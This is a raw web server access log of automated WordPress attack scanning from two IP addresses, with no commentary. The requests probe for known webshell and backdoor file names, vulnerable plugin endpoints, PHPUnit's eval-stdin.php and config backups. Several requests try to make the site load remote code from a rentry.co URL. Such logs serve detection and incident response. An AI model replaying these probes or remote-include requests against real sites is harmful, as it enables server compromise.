37.0.11.107 - - [20/Jul/2021:05:16:50 -0400] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 44020 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:17:15 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 301 535 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:17:37 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 301 5160 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:18:05 -0400] "GET /wp-includes/lfx.php HTTP/1.1" 404 43960 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:18:58 -0400] "GET /wp-includes/small.php HTTP/1.1" 301 539 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:19:17 -0400] "GET /wp-includes/small.php HTTP/1.1" 301 5164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:19:49 -0400] "GET /wp-includes/small.php HTTP/1.1" 404 43937 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:20:17 -0400] "GET /up.php HTTP/1.1" 301 509 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:20:33 -0400] "GET /up.php HTTP/1.1" 301 5134 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:20:41 -0400] "GET /up.php HTTP/1.1" 404 43918 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:21:26 -0400] "GET /upload.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:22:15 -0400] "GET /config.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:22:46 -0400] "GET /config.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:23:07 -0400] "GET /config.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:23:16 -0400] "GET /test.php?Ghost=send HTTP/1.1" 301 535 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:23:46 -0400] "GET /test.php?Ghost=send HTTP/1.1" 301 5160 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:24:48 -0400] "GET /wp-content/langar.php HTTP/1.1" 301 539 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:25:05 -0400] "GET /wp-content/langar.php HTTP/1.1" 301 5164 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:25:37 -0400] "GET /wp-content/langar.php HTTP/1.1" 404 43966 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:26:32 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 597 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:26:52 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 301 637 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:27:07 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 301 5262 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:27:20 -0400] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 44122 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:27:58 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 301 609 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:28:08 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 301 5234 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
37.0.11.107 - - [20/Jul/2021:05:28:32 -0400] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 44054 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:34:09 -0400] "GET /style.php HTTP/1.1" 301 515 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:34:26 -0400] "GET /style.php HTTP/1.1" 301 5140 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:34:34 -0400] "GET /style.php HTTP/1.1" 404 43927 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:34:58 -0400] "GET /moduless.php HTTP/1.1" 301 521 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:35:05 -0400] "GET /moduless.php HTTP/1.1" 301 5146 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:35:22 -0400] "GET /moduless.php HTTP/1.1" 404 43907 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:36:11 -0400] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 301 603 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:36:35 -0400] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 301 5228 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:37:13 -0400] "GET /admin.php HTTP/1.1" 301 515 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:37:18 -0400] "GET /admin.php HTTP/1.1" 301 5140 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:37:27 -0400] "GET /admin.php HTTP/1.1" 404 43927 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:37:43 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 527 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:38:01 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 5152 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:38:21 -0400] "GET /index.php?3x=3x HTTP/1.1" 301 5227 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:38:45 -0400] "GET /boom.php?x HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:38:53 -0400] "GET /boom.php?x HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:39:10 -0400] "GET /boom.php?x HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:39:49 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 567 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:39:59 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 301 5192 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:40:12 -0400] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 44011 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:41:03 -0400] "GET /wp-content/db_cache.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:41:19 -0400] "GET /wp-content/db_cache.php HTTP/1.1" 301 5168 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:41:48 -0400] "GET /wp-content/db_cache.php HTTP/1.1" 404 43972 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:42:17 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 599 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:42:27 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 301 5224 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:42:36 -0400] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 44062 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:43:10 -0400] "GET /xmlrp.php?url=https://rentry.co/yu8xc/raw HTTP/1.1" 301 579 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:43:20 -0400] "GET /xmlrp.php?url=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5204 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:44:22 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 583 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:44:59 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5208 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:45:11 -0400] "GET /wpindex.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44059 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:45:33 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 579 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:45:39 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5204 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:45:42 -0400] "GET /larva.php?idb=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44053 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:45:51 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 301 587 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:46:01 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 301 5212 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:46:18 -0400] "GET /th3_err0r.php?php=https://rentry.co/yu8xc/raw HTTP/1.1" 404 44065 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:47:48 -0400] "GET /alfindex.php HTTP/1.1" 301 521 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:48:06 -0400] "GET /alfindex.php HTTP/1.1" 301 5146 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:48:16 -0400] "GET /alfindex.php HTTP/1.1" 404 43936 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:48:30 -0400] "GET /alfa.php HTTP/1.1" 301 513 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:48:55 -0400] "GET /alfa.php HTTP/1.1" 301 5138 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:49:04 -0400] "GET /alfa.php HTTP/1.1" 404 43924 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:49:27 -0400] "GET /wp-booking.php HTTP/1.1" 301 525 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:49:57 -0400] "GET /cindex.php HTTP/1.1" 301 517 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:50:07 -0400] "GET /cindex.php HTTP/1.1" 301 5142 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:50:16 -0400] "GET /cindex.php HTTP/1.1" 404 43930 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:50:52 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 301 551 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:51:09 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 301 5176 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:51:29 -0400] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 43984 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:52:01 -0400] "GET /wp-1ogin_bak.php HTTP/1.1" 301 529 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:52:09 -0400] "GET /wp-1ogin_bak.php HTTP/1.1" 301 5154 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:52:37 -0400] "GET /wp-includes/fonts/css.php HTTP/1.1" 301 547 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:52:44 -0400] "GET /wp-includes/fonts/css.php HTTP/1.1" 301 5172 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:52:51 -0400] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 43981 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:53:06 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:53:19 -0400] "GET /wp-includes/css/css.php HTTP/1.1" 301 5168 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:54:00 -0400] "GET /old-index.php HTTP/1.1" 301 523 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:54:13 -0400] "GET /old-index.php HTTP/1.1" 301 5148 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:54:43 -0400] "GET /old-index.php HTTP/1.1" 404 43939 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:55:05 -0400] "GET /config.bak.php HTTP/1.1" 301 525 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:55:24 -0400] "GET /config.bak.php HTTP/1.1" 301 5150 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:55:38 -0400] "GET /config.bak.php HTTP/1.1" 404 43942 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:56:12 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 301 543 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:56:24 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 301 5168 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:56:43 -0400] "GET /wp-admin/config.bak.php HTTP/1.1" 404 43972 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:56:53 -0400] "GET /wp-content/config.bak.php HTTP/1.1" 301 547 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:57:04 -0400] "GET /wp-content/config.bak.php HTTP/1.1" 301 5172 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:57:26 -0400] "GET /wp-content/config.bak.php HTTP/1.1" 404 43949 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:57:51 -0400] "GET /wp-includes/config.bak.php HTTP/1.1" 301 549 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:58:25 -0400] "GET /wp-includes/config.bak.php HTTP/1.1" 301 5174 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:58:48 -0400] "GET /wp-includes/config.bak.php HTTP/1.1" 404 43981 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:59:01 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 561 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:59:07 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 301 5186 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
195.133.40.19 - - [20/Jul/2021:11:59:30 -0400] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 44002 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36"
